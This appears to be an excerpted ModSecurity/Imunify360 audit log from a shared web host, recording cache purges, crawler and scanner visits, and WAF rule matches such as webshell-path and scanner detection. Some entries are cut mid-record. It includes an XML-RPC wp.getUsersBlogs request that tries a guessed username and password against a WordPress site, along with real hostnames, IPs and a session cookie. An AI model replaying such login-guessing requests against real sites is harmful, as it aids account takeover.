aGMvhCBqNKRCSqeD5YuOyQAAACg 103.185.74.40 27675 192.168.74.40 443 --0c0d8074-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --0c0d8074-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0c0d8074-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751330692855179 1290847 (- - -) Stopwatch2: 1751330692855179 1290847; combined=2338, p1=83, p2=2031, p3=0, p4=0, p5=223, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0c0d8074-Z-- --73824116-A-- [01/Jul/2025:06:14:54.195833 +0530] aGMvhoCn6y9y4ldwgOvinwAAABc 20.171.207.232 47554 192.168.74.40 443 --73824116-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-jodhpur/js/Rajasthan-Travel-Guides/js/js/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --73824116-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --73824116-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751330696515668 16560 (- - -) Stopwatch2: 1751330696515668 16560; combined=3610, p1=167, p2=3287, p3=0, p4=0, p5=155, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --96ea7d7e-Z-- --89ce5906-A-- [01/Jul/2025:06:14:56.846015 +0530] aGMvhg6iKh3t2y2EfwjfIwAAABE 103.185.74.40 30626 192.168.74.40 443 --89ce5906-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --89ce5906-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --89ce5906-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751330694356912 2489629 (- - -) Stopwatch2: 1751330694356912 2489629; combined=1732, p1=66, p2=1435, p3=0, p4=0, p5=230, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --89ce5906-Z-- --68cbf23c-A-- [01/Jul/2025:06:14:57.162965 +0530] aGMvifGKoc1BiGCuksEQDgAAAA8 124.156.226.179 53246 192.168.74.40 443 --68cbf23c-B-- GET /women.html HTTP/1.1 Host: www.jucosexpo.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --68cbf23c-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Connection: close -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d8dfe05e-Z-- --f6702c75-A-- [01/Jul/2025:06:33:11.945675 +0530] aGMzzw7BtT1UbD7ZHT9pSAAAAB8 43.153.74.75 53406 192.168.74.40 80 --f6702c75-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --f6702c75-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --f6702c75-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751331791936804 9275 (- - -) Stopwatch2: 1751331791936804 9275; combined=5723, p1=122, p2=5311, p3=104, p4=3, p5=182, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f6702c75-Z-- --67dc7543-A-- [01/Jul/2025:06:33:12.928097 +0530] aGMz0GEtLcOE7PLrCH5WcAAAAAU 20.171.207.232 39302 192.168.74.40 443 --67dc7543-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/Rajasthan-Travel-Guides/js/https/https/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --67dc7543-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --67dc7543-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/Rajasthan-Travel-Guides/js/https/https/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7b00fc50-Z-- --68c78d2d-A-- [01/Jul/2025:06:34:49.967490 +0530] aGM0Mc-bN96naeOUiN1ZhgAAABE 147.185.133.239 60254 192.168.74.40 443 --68c78d2d-B-- GET / HTTP/1.1 Host: 103.185.74.40:443 User-Agent: Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com Accept-Encoding: gzip --68c78d2d-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --68c78d2d-H-- Message: Access denied with code 403 (phase 1). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "121"] [id "77350470"] [msg "IM360 WAF: Vulnerability scanner detected||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 1) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751331889414206 553535 (- - -) Stopwatch2: 1751331889414206 553535; combined=271, p1=91, p2=0, p3=0, p4=0, p5=180, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --68c78d2d-Z-- --c1ceb70e-A-- [01/Jul/2025:06:34:50.050987 +0530] aGM0L5TzP1Ur28j7gprRnQAAACo 216.73.217.7 9522 192.168.74.40 80 --c1ceb70e-B-- GET /robots.txt HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) Accept-Encoding: gzip, br, zstd, deflate Host: rmhil.com Via: 1.1 squid-proxy-5b5d847c96-j2wms (squid/6.10) X-Forwarded-For: 10.3.22.169 Cache-Control: max-age=259200 Connection: keep-alive --c1ceb70e-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/7.4.33 Link: <https://rmhil.com/wp-json/>; rel="https://api.w.org/" Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 --c1ceb70e-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/011_i360_otherapps.conf"] [line "434"] [id "77350583"] [msg "IM360 WAF: Scan attempt by claudebot crawler||UA:Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751334292763897 15904 (- - -) Stopwatch2: 1751334292763897 15904; combined=2984, p1=152, p2=2619, p3=0, p4=0, p5=213, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a4fb9e76-Z-- --da50c22b-A-- [01/Jul/2025:07:14:55.116953 +0530] aGM9lfVtJS68yMzN9xuwiQAAABU 103.185.74.40 63550 192.168.74.40 443 --da50c22b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --da50c22b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --da50c22b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751334293808260 1309017 (- - -) Stopwatch2: 1751334293808260 1309017; combined=2936, p1=109, p2=2636, p3=0, p4=0, p5=190, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --da50c22b-Z-- --a38bd649-A-- [01/Jul/2025:07:14:56.762807 +0530] aGM9l62-ixoIBBCJCfxxHgAAABc 103.185.74.40 59174 192.168.74.40 443 --a38bd649-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --a38bd649-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a38bd649-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751334295327996 1435274 (- - -) Stopwatch2: 1751334295327996 1435274; combined=2174, p1=83, p2=1927, p3=0, p4=0, p5=164, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a38bd649-Z-- --9097dc63-A-- [01/Jul/2025:07:14:57.581788 +0530] aGM9mLpzrkpcv5GNoryYUgAAAA0 103.145.63.232 58782 192.168.74.40 443 --9097dc63-B-- POST /xmlrpc.php HTTP/1.1 Host: shreyamouldcrafts.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Content-Length: 224 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip, br, zstd Accept-Language: ja-JP,ja;q=0.9 Content-Type: application/xml Referer: https://shreyamouldcrafts.com --9097dc63-C-- <?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>hukum</string></value></param><param><value><string>shreyamouldcrafts2017</string></value></param></params></methodCall> --9097dc63-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751336337399805 17098 (- - -) Stopwatch2: 1751336337399805 17098; combined=3279, p1=126, p2=2677, p3=0, p4=0, p5=475, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2b57a477-Z-- --489aae2e-A-- [01/Jul/2025:07:48:59.830081 +0530] aGNFj3_j2110C7XX4gcMggAAABU 103.185.74.40 33588 192.168.74.40 443 --489aae2e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --489aae2e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --489aae2e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751336335976360 3854316 (- - -) Stopwatch2: 1751336335976360 3854316; combined=2276, p1=97, p2=2031, p3=0, p4=0, p5=148, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --489aae2e-Z-- --d9db740b-A-- [01/Jul/2025:07:49:00.163511 +0530] aGNFk7AFmXay8G4aXBADAgAAAAM 172.68.205.24 34530 192.168.74.40 80 --d9db740b-B-- POST /xmlrpc.php HTTP/1.1 Host: mariaalliedhealthscience.org X-Real-IP: 31.193.2.236 X-Remote-IP: 172.68.205.24 Content-Length: 211 x-forwarded-for: 31.193.2.236 accept-encoding: gzip Accept-Language: ru-RU,ru;q=0.9 Referer: http://mariaalliedhealthscience.org -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751336339270265 893671 (- - -) Stopwatch2: 1751336339270265 893671; combined=5921, p1=92, p2=5138, p3=235, p4=5, p5=370, sr=139, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d9db740b-Z-- --5ebefa00-A-- [01/Jul/2025:07:49:01.147918 +0530] aGNFlBZBUQk-wboZMiqhgQAAABc 103.185.74.40 3423 192.168.74.40 443 --5ebefa00-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --5ebefa00-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5ebefa00-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751336340041912 1106428 (- - -) Stopwatch2: 1751336340041912 1106428; combined=3171, p1=113, p2=2918, p3=0, p4=0, p5=139, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5ebefa00-Z-- --5941dc33-A-- [01/Jul/2025:07:49:10.640530 +0530] aGNFnhs_v8K_J_8qeCloPgAAAA8 43.135.130.202 55074 192.168.74.40 80 --5941dc33-B-- GET / HTTP/1.1 Host: sunraysyoga.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337097448714 16354 (- - -) Stopwatch2: 1751337097448714 16354; combined=2965, p1=172, p2=2656, p3=0, p4=0, p5=137, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ab26594f-Z-- --136cee17-A-- [01/Jul/2025:08:01:37.467610 +0530] aGNIhJAal_lbtDt49KyZfAAAAD0 103.185.74.40 12127 192.168.74.40 443 --136cee17-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --136cee17-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --136cee17-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337092886065 4582262 (- - -) Stopwatch2: 1751337092886065 4582262; combined=2710, p1=104, p2=2456, p3=0, p4=0, p5=149, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --136cee17-Z-- --d44e7074-A-- [01/Jul/2025:08:01:37.501200 +0530] aGNIiegYxrXZL1YJMPV6qwAAAAk 195.210.127.8 63437 192.168.74.40 80 --d44e7074-B-- POST /xmlrpc.php HTTP/1.1 Host: infiact.com Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=84138d55a504a840affdf6142a7b2e32 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml Content-Length: 493 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337098126156 498562 (- - -) Stopwatch2: 1751337098126156 498562; combined=9165, p1=136, p2=8189, p3=243, p4=5, p5=502, sr=126, sw=90, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e5446871-Z-- --157b1940-A-- [01/Jul/2025:08:01:38.757537 +0530] aGNIiem0COR1YAqwx3-hRQAAAEI 103.185.74.40 11546 192.168.74.40 443 --157b1940-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --157b1940-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --157b1940-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337097677278 1080932 (- - -) Stopwatch2: 1751337097677278 1080932; combined=2504, p1=115, p2=2270, p3=0, p4=0, p5=119, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --157b1940-Z-- --5c288c65-A-- [01/Jul/2025:08:01:38.791280 +0530] aGNIikT6yyussdnsqIqhZwAAAAU 195.210.127.2 39715 192.168.74.40 443 --5c288c65-B-- POST //xmlrpc.php HTTP/1.1 Host: raghuveergears.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml Content-Length: 489 --5c288c65-C-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337895703621 20221 (- - -) Stopwatch2: 1751337895703621 20221; combined=7864, p1=192, p2=7181, p3=204, p4=4, p5=282, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --522be704-Z-- --e9d2205c-A-- [01/Jul/2025:08:14:57.649365 +0530] aGNLqF21aF0CJnh4fMjXwQAAAF4 103.185.74.40 5571 192.168.74.40 443 --e9d2205c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --e9d2205c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e9d2205c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337896349889 1299921 (- - -) Stopwatch2: 1751337896349889 1299921; combined=2225, p1=98, p2=1922, p3=0, p4=0, p5=205, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e9d2205c-Z-- --50b1c572-A-- [01/Jul/2025:08:14:57.660897 +0530] aGNLqYd9JBq-2RBWhPDCiQAAABU 20.171.207.232 38536 192.168.74.40 443 --50b1c572-B-- GET /rajasthan-tours-from-udaipur/rajasthan-tours-from-jodhpur/rajasthan-tours-from-ahmedabad/https/aainag/rajasthan-tours-from-jaipur/images/our-services.php HTTP/1.1 